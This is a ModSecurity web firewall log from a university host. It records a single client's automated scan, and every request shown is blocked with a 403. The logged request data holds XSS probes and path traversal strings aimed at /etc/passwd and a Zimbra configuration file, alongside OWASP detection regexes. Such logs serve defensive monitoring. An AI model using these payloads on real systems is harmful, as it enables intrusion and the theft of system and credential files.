[Tue Aug 29 11:52:23.645653 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x22- found within ARGS:url: xss://\\x22-alert(document.domain)-\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/embed-swagger/swagger-iframe.php"] [unique_id "ZO15h8Co-f0AAAoO5yUAAAAK"]
[Tue Aug 29 11:52:24.825076 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: 2Ue0JPPIf6oq1562KE1G556xZAu\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/templates/pages/debug_panel.php"] [unique_id "ZO15iMCo-f0AAAn400oAAAAW"]
[Tue Aug 29 11:52:25.595639 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../opt/zimbra/conf/localconfig.xml\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15icCo-f0AAAoLfFMAAAAG"]
[Tue Aug 29 11:52:26.552070 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/public/login.jsp"] [unique_id "ZO15isCo-f0AAAfWONkAAAAL"]
[Tue Aug 29 11:52:26.607101 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:skin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:skin: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx TemplateMsg.js.zgz"] [unique_id "ZO15isCo-f0AAAoO5y0AAAAK"]
[Tue Aug 29 11:52:26.626589 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HK1NKDlhXaLCZfBctpGOJrj')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO15isCo-f0AAAoO5y4AAAAK"]
[Tue Aug 29 11:52:26.649002 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:page: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php"] [unique_id "ZO15isCo-f0AAAnoOrQAAAAf"]
[Tue Aug 29 11:52:27.600941 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:author: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15i8Co-f0AAAoO5zAAAAAK"]
[Tue Aug 29 11:52:27.675992 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/acs/..;/admin/public/login.jsp"] [unique_id "ZO15i8Co-f0AAAoLfFgAAAAG"]
[Tue Aug 29 11:52:28.563201 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:color. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:color: \\x22><svg/onload=alert(document.domain)>\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO15jMCo-f0AAAmNp7QAAAAQ"]
[Tue Aug 29 11:52:28.680954 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15jMCo-f0AAAnjjO0AAAAX"]
[Tue Aug 29 11:52:29.880601 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:ij6fm"><script>alert(1337)</script>vg9q6c4g1mk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk: ij6fm\\x22><script>alert(1337)</script>vg9q6c4g1mk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/pmb/opac_css/index.php"] [unique_id "ZO15jcCo-f0AAAnjjPIAAAAX"]
[Tue Aug 29 11:52:30.566557 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAfWOOUAAAAL"]
[Tue Aug 29 11:52:33.567666 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAoQ3I4AAAAN"]
[Tue Aug 29 11:52:33.640869 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAoGFYcAAAAE"]
[Tue Aug 29 11:52:33.747200 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoGFYkAAAAE"]
[Tue Aug 29 11:52:34.633435 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoPuVYAAAAM"]
[Tue Aug 29 11:52:34.671187 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoN9eQAAAAJ"]
[Tue Aug 29 11:52:37.567001 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAnHQlYAAAAT"]
[Tue Aug 29 11:52:37.587542 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnHQlcAAAAT"]
[Tue Aug 29 11:52:37.588981 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAnd3IkAAAAI"]
[Tue Aug 29 11:52:40.605588 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoVqncAAAAH"]
[Tue Aug 29 11:52:40.635747 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAlUlugAAAA0"]
[Tue Aug 29 11:52:41.630479 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoO51oAAAAK"]
[Tue Aug 29 11:52:42.587933 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoLfJQAAAAG"]
[Tue Aug 29 11:52:42.631562 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnd3KgAAAAI"]
[Tue Aug 29 11:52:44.540921 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoLfKAAAAAG"]
[Tue Aug 29 11:52:45.639191 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoO53gAAAAK"]
